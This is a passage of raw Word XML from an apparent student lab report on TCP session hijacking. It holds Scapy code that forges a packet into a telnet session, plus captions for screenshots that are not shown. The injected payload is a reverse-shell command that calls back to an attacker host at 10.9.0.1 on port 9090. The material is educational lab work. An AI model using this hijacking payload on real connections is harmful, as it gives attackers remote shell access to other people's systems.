    </w:p>
    <w:p w14:paraId="1D8602D7" w14:textId="77777777" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="00083AD9">
      <w:r>
        <w:t>ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DA9734" w14:textId="3927ACED" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="00083AD9">
      <w:r>
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13890070" w14:textId="09E29664" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="002D5FFC"/>
    <w:p w14:paraId="54B03BAA" w14:textId="07EDD196" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="002D5FFC"/>
    <w:p w14:paraId="498E1F63" w14:textId="6C570622" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="002D5FFC"/>
    <w:p w14:paraId="61933924" w14:textId="6803FE68" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="002D5FFC"/>
    <w:p w14:paraId="7C43BDEF" w14:textId="4DDA7814" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="002D5FFC"/>
    <w:p w14:paraId="513D73A7" w14:textId="3D8AA615" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="002D5FFC"/>
    <w:p w14:paraId="0B125A5C" w14:textId="5A213005" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="002D5FFC"/>
    <w:p w14:paraId="463C1D49" w14:textId="77777777" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="002D5FFC"/>
    <w:p w14:paraId="57029E4C" w14:textId="4A7D7DFB" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="002D5FFC">
      <w:r>
        <w:t>Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16B3F60C" w14:textId="29877AFB" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="000A19A2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Running hijacking program:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7F2FF792" wp14:editId="60165741">
            <wp:extent cx="5752752" cy="490537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182" cy="4924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39E6E221" wp14:editId="7DE7BEE4">
                <wp:extent cx="304800" cy="304800"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:docPr id="24" name="Rectangl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C5F09A" id="Rectangle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D85AF06" w14:textId="62C41DDE" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="000A19A2">
      <w:r>
        <w:t>Wireshark screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18BAC0D1" w14:textId="2396958F" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="000A19A2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0E442611" wp14:editId="704509D1">
            <wp:extent cx="5737860" cy="27178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28" cy="27245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F44186" w14:textId="77777777" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="000A19A2"/>
    <w:p w14:paraId="52EFACFD" w14:textId="0DE39232" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="000A19A2">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Output screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6C3EEF" w14:textId="63A5B042" w:rsidR="00083AD9" w:rsidRDefault="00083AD9" w:rsidP="000A19A2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="184DA7FB" wp14:editId="1101454E">
            <wp:extent cx="4036113" cy="18891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848" cy="189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67ACC4" w14:textId="325BBE69" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="000A19A2"/>
    <w:p w14:paraId="04A48882" w14:textId="3D701A79" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="000A19A2">
      <w:r>
        <w:t>Task 4:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10B4731F" w14:textId="49FAF88D" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="000A19A2">
      <w:r>
        <w:t xml:space="preserve"> Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02457CCE" w14:textId="77777777" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA">
      <w:r>
        <w:t>#!/usr/bin/env python3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED1AC19" w14:textId="77777777" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA">
      <w:r>
        <w:t>from scapy.all import *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CC41CF2" w14:textId="77777777" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="5A971C92" w14:textId="77777777" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA">
      <w:r>
        <w:t>ip  = IP(src="10.9.0.6", dst="10.9.0.5")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="722FF0C4" w14:textId="77777777" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA">
      <w:r>
        <w:t>tcp = TCP(sport = 55216, dport = 23, flags="A", seq= 129548565, ack = 3400623429)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34348657" w14:textId="77777777" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA">
      <w:r>
        <w:t>data = '\n/bin/sh -i &gt; /dev/tcp/10.9.0.1/9090 0&lt;&amp;1 2&gt;&amp;1 \n'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E128A40" w14:textId="77777777" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA">
      <w:r>
        <w:t>pkt = ip/tcp/data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="084EA081" w14:textId="77777777" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA">
      <w:r>
        <w:t>ls(pkt)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1E1742" w14:textId="2A830F5D" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA">
      <w:r>
        <w:t>send(pkt, verbose=0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F12759" w14:textId="6C2FD7D8" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="0278739B" w14:textId="61F7B7C8" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="77524F85" w14:textId="2BC18652" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="3A4ACBEF" w14:textId="627E68FD" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="268E9198" w14:textId="46744C56" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="76A14A18" w14:textId="24A4662B" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="51F04561" w14:textId="09A27834" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="38EA0DD3" w14:textId="06213491" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="42EA5B25" w14:textId="33B76452" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="1D907B60" w14:textId="4AD9E6B2" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="247405D2" w14:textId="77777777" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="0CCD3943" w14:textId="5B9A3A43" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Screenshots:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3241CD8E" w14:textId="46B9F701" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA">
      <w:r>
        <w:t>Running program:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6745B2F5" w14:textId="1B3080EE" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA">
      <w:r w:rsidRPr="00401CFA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2ECEDD6A" wp14:editId="1A1D2C0E">
            <wp:extent cx="5731510" cy="3235325"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="29" name="Picture 2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504C" w14:textId="121003E3" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="0B71D098" w14:textId="3D13210B" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA">
      <w:r>
        <w:t>Wireshark Screenshot:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E7800F" w14:textId="4D2AFFC0" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA">
      <w:r w:rsidRPr="00401CFA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2EC493F3" wp14:editId="27784CE7">
            <wp:extent cx="5731510" cy="2975610"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="30" name="Picture 30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4DAF" w14:textId="3E8AD963" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="6FC2883F" w14:textId="14F1DE90" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="1DF3EF97" w14:textId="323B2CF4" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="55BD64AE" w14:textId="5DCC3B34" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA"/>
    <w:p w14:paraId="7F082B7A" w14:textId="0D133669" w:rsidR="00401CFA" w:rsidRDefault="00401CFA" w:rsidP="00401CFA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Program Output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="351AFFC2" w14:textId="79F4EF90" w:rsidR="00401CFA" w:rsidRPr="00593545" w:rsidRDefault="00401CFA" w:rsidP="00401CFA">
      <w:r w:rsidRPr="00401CFA">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4497536F" wp14:editId="30068685">
            <wp:extent cx="5731510" cy="21799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1CFA" w:rsidRPr="005935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545"/>
    <w:rsid w:val="00083AD9"/>
    <w:rsid w:val="00085536"/>
    <w:rsid w:val="00094667"/>
    <w:rsid w:val="000A19A2"/>
    <w:rsid w:val="001B21EA"/>
    <w:rsid w:val="00270775"/>
    <w:rsid w:val="002D5FFC"/>
    <w:rsid w:val="003429DD"/>
    <w:rsid w:val="003B3D94"/>
    <w:rsid w:val="00401CFA"/>
    <w:rsid w:val="005521A0"/>
    <w:rsid w:val="00593545"/>
    <w:rsid w:val="0060794A"/>
    <w:rsid w:val="00657748"/>
    <w:rsid w:val="006A6AF8"/>
    <w:rsid w:val="00742A6A"/>
    <w:rsid w:val="008F1B1F"/>
    <w:rsid w:val="00925C17"/>
    <w:rsid w:val="00B774C5"/>
    <w:rsid w:val="00C2496B"/>
    <w:rsid w:val="00C5291F"/>
    <w:rsid w:val="00D602E7"/>
    <w:rsid w:val="00E10556"/>
    <w:rsid w:val="00ED4B8D"/>
    <w:rsid w:val="00F3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DED6F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{9EF910C6-CA7D-40BC-BFF2-822471243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1408</TotalTime>
  <Pages>12</Pages>
  <Words>378</Words>
  <Characters>2156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Syam Siva Kumar</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Syam Siva Kumar</cp:lastModifiedBy>
  <cp:revision>21</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-02-08T01:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-02-09T00:55:00Z</dcterms:modified>
</cp:coreProperties>
</file>